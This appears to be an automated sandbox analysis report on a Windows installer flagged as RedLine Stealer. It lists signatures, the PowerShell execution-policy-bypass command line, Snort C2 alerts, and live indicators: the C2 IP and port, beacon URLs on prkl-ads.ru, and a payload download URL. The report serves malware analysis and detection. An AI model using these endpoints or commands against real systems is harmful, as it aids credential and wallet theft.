Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Analysis ID:1294691
MD5:19124312cafa0b1c5524329755a5d6a2
SHA1:ccd8c01b210b26cd708a3e4cc49de45fed9abac1
SHA256:0190e867668e9be091e3d52261b62ef9b65059565ec17168813f82e7693af2fd
Tags:exe
Infos:

Detection

RedLine
Score:50
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected MalDoc
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Bypasses PowerShell execution policy
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Adds / modifies Windows certificates
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe (PID: 7528 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe MD5: 19124312CAFA0B1C5524329755A5D6A2)
    • msiexec.exe (PID: 7736 cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692672474 " MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • msiexec.exe (PID: 7632 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 7684 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E08B609454A113DDC10D91901CD8422B C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • msiexec.exe (PID: 7812 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A46D6CE3215E9284ACEDBCBDAD509E67 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • powershell.exe (PID: 7976 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss6E59.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi6E45.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr6E46.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr6E47.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Windows\Installer\6766e2.msiJoeSecurity_MalDocYara detected MalDocJoe Security
        C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msiJoeSecurity_MalDocYara detected MalDocJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.345.135.232.244973698782046105 08/21/23-19:35:51.013900
          SID:2046105
          Source Port:49736
          Destination Port:9878
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.345.135.232.244973798782046045 08/21/23-19:35:51.481894
          SID:2046045
          Source Port:49737
          Destination Port:9878
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:45.135.232.24192.168.2.39878497372046056 08/21/23-19:35:54.924171
          SID:2046056
          Source Port:9878
          Destination Port:49737
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.345.135.232.244973698782046045 08/21/23-19:35:51.013900
          SID:2046045
          Source Port:49736
          Destination Port:9878
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.345.135.232.244973798782046105 08/21/23-19:35:54.854691
          SID:2046105
          Source Port:49737
          Destination Port:9878
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeReversingLabs: Detection: 13%
          Source: unknownHTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49735 version: TLS 1.0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49736 version: TLS 1.2
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: certificate valid
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: wininet.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.dr
          Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr
          Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb| source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, MSI6B9A.tmp.1.dr
          Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, MSI6B9A.tmp.1.dr
          Source: Binary string: wininet.pdbUGP source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.dr
          Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr
          Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr
          Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb_ source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr
          Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: v:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: t:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: r:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: p:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: n:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: l:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: j:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: h:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: f:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: b:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: y:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: w:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: u:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: s:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: q:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: o:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: m:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: k:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: i:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: g:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: e:Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: a:Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_004927F0 ReadFile,FindFirstFileW,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_004927F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0046C9A0 FindFirstFileW,GetLastError,FindClose,0_2_0046C9A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0046C040 _wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_0046C040
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0046E270 FindFirstFileW,FindClose,0_2_0046E270
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_004B08C0 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_004B08C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0047AB40 FindFirstFileW,FindClose,FindClose,0_2_0047AB40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0049CDD0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_0049CDD0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_003711B0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW,0_2_003711B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0049D1D0 FindFirstFileW,FindClose,0_2_0049D1D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00451410 FindFirstFileW,FindNextFileW,FindClose,0_2_00451410

          Networking

          barindex
          Yara detected MalDoc
          Source: Yara matchFile source: C:\Windows\Installer\6766e2.msi, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi, type: DROPPED
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) 192.168.2.3:49736 -> 45.135.232.24:9878
          Source: TrafficSnort IDS: 2046105 ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound) 192.168.2.3:49736 -> 45.135.232.24:9878
          Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) 192.168.2.3:49737 -> 45.135.232.24:9878
          Source: TrafficSnort IDS: 2046105 ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound) 192.168.2.3:49737 -> 45.135.232.24:9878
          Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer Activity (Response) 45.135.232.24:9878 -> 192.168.2.3:49737
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownHTTPS traffic detected: 81.177.140.69:443 -> 192.168.2.3:49735 version: TLS 1.0
          Source: global trafficHTTP traffic detected: GET /?status=reg&key=llks74638sj&site=Test HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ruConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /?status=start&av=Windows%20Defender HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ru
          Source: global trafficHTTP traffic detected: GET /?status=install HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ru
          Source: Joe Sandbox ViewASN Name: ASBAXETNRU ASBAXETNRU
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 45.135.232.24:9878
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.drString found in binary or memory: http://.css
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.drString found in binary or memory: http://.jpg
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6D31.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-RSA-Q
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: powershell.exe, 00000006.00000003.382384474.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.382588413.0000000007A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m2
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.drString found in binary or memory: http://crls.ssl.co
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigniP
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6D31.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.drString found in binary or memory: http://html4/loose.dtd
          Source: powershell.exe, 00000006.00000003.465169858.0000000007CD1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.473628082.0000000007CE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.ado/1
          Source: powershell.exe, 00000006.00000003.465169858.0000000007CD1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.473628082.0000000007CE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
          Source: powershell.exe, 00000006.00000003.465169858.0000000007CD1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.473628082.0000000007CE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cobj
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, Helper1.cab.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.drString found in binary or memory: http://ocsps.ssl.com0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: http://t2.symcb.com0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crl0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: http://tl.symcb.com/tl.crt0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: http://tl.symcd.com0&
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, scr6E46.ps1.4.dr, 6766e2.msi.1.drString found in binary or memory: https://metacookie25c19ec61c.blob.core.windows.net/test/build.jpg
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, scr6E46.ps1.4.dr, 6766e2.msi.1.drString found in binary or memory: https://prkl-ads.ru/?status=start&av=$displayNamesString
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, scr6E46.ps1.4.dr, 6766e2.msi.1.drString found in binary or memory: https://prkl-ads.ru?status=reg&key=llks74638sj&site=Test
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: https://www.advancedinstaller.com
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6D31.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.drString found in binary or memory: https://www.ssl.com/repository0
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: https://www.thawte.com/cps0/
          Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.drString found in binary or memory: https://www.thawte.com/repository0W
          Source: unknownDNS traffic detected: queries for: prkl-ads.ru
          Source: global trafficHTTP traffic detected: GET /?status=reg&key=llks74638sj&site=Test HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ruConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /?status=start&av=Windows%20Defender HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ru
          Source: global trafficHTTP traffic detected: GET /?status=install HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: prkl-ads.ru
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
          Source: unknownTCP traffic detected without corresponding DNS query: 45.135.232.24
